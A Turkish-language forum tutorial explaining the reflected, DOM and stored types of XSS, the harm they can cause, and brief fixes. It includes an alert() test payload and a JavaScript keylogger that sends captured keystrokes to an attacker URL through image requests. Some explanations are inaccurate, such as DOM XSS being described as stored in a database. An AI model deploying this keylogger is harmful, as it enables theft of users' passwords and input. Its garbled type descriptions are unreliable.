Öncelikle Herkese Merhabalar. Bu konuda sizlere XSS'den bahsedeceğim. İyi Okumalar.
Konu Başlıkları;
Konu Başlıkları;
- -Stored XSS
- -Reflected XSS
- -DOM XSS
- -XSS zafiyetinin verebileceği zararlar
- *Çerez hırsızlığı
- *Kimlik hırsızlığı
- *Keylogger ekleme
- -XSS zafiyeti çözümü
Reflected XSS
Öncelikle her hangi bir arama yerine ; HTML veya Java Script kodu yazıp aratır , bize bir yanıt geldiyse ve bu yanıtı biz görebiliyor ise bir Reflected XSS açığı vardır. Bu açık diğer XSS açıklarına göre daha çok karşımıza çıkabilir ve genellikle en az zarar verebileceğimiz türdür.
2. DOM XSS
DOM XSS ise ; her hangi bir veri girdiğinizde direkt olarak mevcut veri tabanına kayıt edip direkt olarak sitede çalıştırmasıdır.. Siz her hangi bir veri girilen , yani girdi yapılan kısma bir kod yazdığınız zaman direkt olarak sitede çalıştırır. Yani örneğin siz her hangi bir ziyaretçi yorumu gibi yerlerde ''<script>alert(/xss/)</script>'' kodunu girdiğinizde bir hata veya site.com sitesinden mesaj gibi bir uyarı geliyor ise o sitede DOM XSS açığı vardır ve bu en çok suistimal edilen ve zarar verilebilen açıktır.
Stored XSS
Buda aslında DOM XSS benzeri bir açıktır. DOMM XSS'de Java Script kodu yerleştirebiliyorduk. Bu açık türünde ise yine aynı şekilde Her hangi bir HTMLkodu yerleştirilir ve yine aynı mantıkla saldırı gerçekleştirilebilir.
XSS Zafiyetinin Verebileceği Zararlar:
XSS zafiyeti ile bir çok saldırı yapılabilir. Her hangi bir XSS zafiyeti bulunan sitede zararlı kodlar (keylogger vb) eklenebilir , hatta bazı xss açıkları ile site indexi değiştirilebilir , bir çok kod ile oynanabilir. Temel olarak XSS zafiyeti ile;
Cookie hırsızlığı yapılabilir.
Keylogger vb yazılımlar kodlar ile yüklenebilir.
Veri tabanları hacklenebilir.
Özel belgeler ve veriler çalınabilir.
Çerez hırsızlığı
Çerezler yani Cookie bir internet sitesi üzerinde bıraktığımız dijital bir ayak izi olarak tanımlanabilir. Yani siz siteye girdiğiniz zaman otomatik olarak kullanıcı adı vb. doldurulmuş olur. Zaten bir çok yerde çerez politikası adı altında bir şey görmüşsünüzdür. Ancak doldurulmuş olması için daha önceden siteye girip , giriş yapmanız ve beni hatırla gibi bir şeyi işaretlemiş olmamız gerekir ancak bazı web siteleri otomatik olarak 'beni hatırla' özelliğini aktif hale getiriyor ve çerezleri kullanıyorlar. İşte bu durumda eğer Hedef Sitede bir XSS zafiyeti var ise bazı komutlar ve yöntemler ile çerezler çalmaya ; kullanıcı adı ve şifre gibi bilgiler ele geçirilmeye çalışılır.
Bu yüzden eğer bir Web Sitesine giriyor ve her hangi bir üyelik yaptırıyor isek mümkün olduğunca çerezleri kullanmamaya çalışmalıyız. Çünkü hesabımız çalınabilir ve birisi kişisel bilgilerimizi ele geçirebilir. Bu yüzden mümkün olduğunca da güvenilir sitelerden başka sitelere kişisel bilgilerimizi vermemeliyiz.
Kimlik Hırsızlığı
Bunda ise ; yine büyük bir tehdit olan Kimlik Hırsızlığı bir nevi benzer bir mantıkla yapılır. Kurbanın sistemine url yönlendirme gibi yollar ile zararlı yazılım(keylogger türevi yazılım) yüklenir ve bununla ; kişisel dökümanlar , kişisel bilgiler ve dahası çalınabilir.ve daha bir çok öxel hayatla ilgili bilgi , veri çalınabilir.
Keylogger ekleme.
XSS zafiyeti bulunan sistemlere ayrıca keylogger da eklenebilir.
Java Script Keylogger
Kod:
var buffer = [];
var attacker = 'http://hedef='
********.onkeypress = function(e) {
var timestamp = Date.now() | 0;
var stroke = {
k: e.key,
t: timestamp
};
buffer.push(stroke);
}
window.setInterval(function() {
if (buffer.length > 0) {
var data = encodeURIComponent(JSON.stringify(buffer));
new Image().src = attacker + data;
buffer = [];
}
}, 200);XSS Zafiyeti Nasıl çözülür?
Öncelikle bazı kullanıcı yorumları gibi alanlarda bazı karakterleri engelleyerek yani filtre yaparak korunabiliriz. Ayrıca Whitelist metodunu da uygulayabiliriz.Ayrıca mümkün olduğunca çerez güvenliğine özen göstermeliyiz.
Son düzenleme:
